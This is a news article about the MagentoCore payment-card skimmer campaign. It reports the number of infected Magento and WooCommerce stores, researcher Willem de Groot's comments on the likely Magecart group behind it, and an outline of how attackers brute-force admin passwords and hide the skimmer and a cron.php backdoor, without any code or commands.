MagentoCore card skimmer discovered on thousands of e-commerce sites

In the last months it has been reported that 7,339 (and counting) individual e-commerce sites have been infested with the MagentoCore card skimmer malware in the last six months, making the malicious script one of the most successful payment card threats out there.

MagentoCore.net

MagentoCore card skimmer discovered on thousands of e-commerce sites

The infections are part of a single effort, all tied back to one well-resourced group with global reach. “Online skimming – your identity and card are stolen while you shop – has been around for a few years, but no campaign has been so prolific as the MagentoCore.net skimmer,” says Willem de Groot, an independent malware hunter.

“The group has turned [thousands]of individual stores into zombie money machines, to the benefit of their illustrious masters.”

De Groot also says that he suspects the Magecart group to be behind it – which is the same outfit that pulled off the Ticketmaster heist earlier in the year. However, attribution beyond the basics remains murky.

“Their collection server is registered in Moscow, but I couldn’t say anything about their location or nationality, unfortunately,” he says.

The campaign is global and ongoing: According to De Groot’s nightly scans, new stores are being hijacked at the alarming pace of 50 to 60 stores per day.

Further, the script appears to be rather persistent: The average recovery time is “a few weeks” he said, with at least 1,450 e-commerce sites hosting the MagentoCore parasite during the full six months of his analysis.

“The victim list contains multimillion dollar, publicly traded companies, which suggests the malware operators make a handsome profit. But the real victims are eventually the customers, who have their cards and identities stolen.”

The Magecart actors are targeting online stores running WooCommerce from WordPress and Magento software, and “the attack vector is, in almost all recent cases, brute-forcing the administrator password.” He said the adversaries are patient, automatically trying millions of common passwords until they find one that works, often over the course of a few months.

Attackers can also gain unauthorized access from a staff computer that’s infected with malware, or by hijacking an authorised session using a vulnerability in the content management system (CMS).

The skimmer has been around since last December, although less sophisticated versions were found as early as 2015. Once the actors succeed in gaining access to the back-end CMS running the website, they embed the MagentoCore Javascript code into the HTML template.

This can be hidden in a few places, including in default HTML headers and footers, and in minimised, static, hidden Javascript files deep in the codebase. It also adds a backdoor to cron.php.

“That will periodically download malicious code, and, after running, delete itself, so no traces are left,” de Groot said.

About Author

Leave A Reply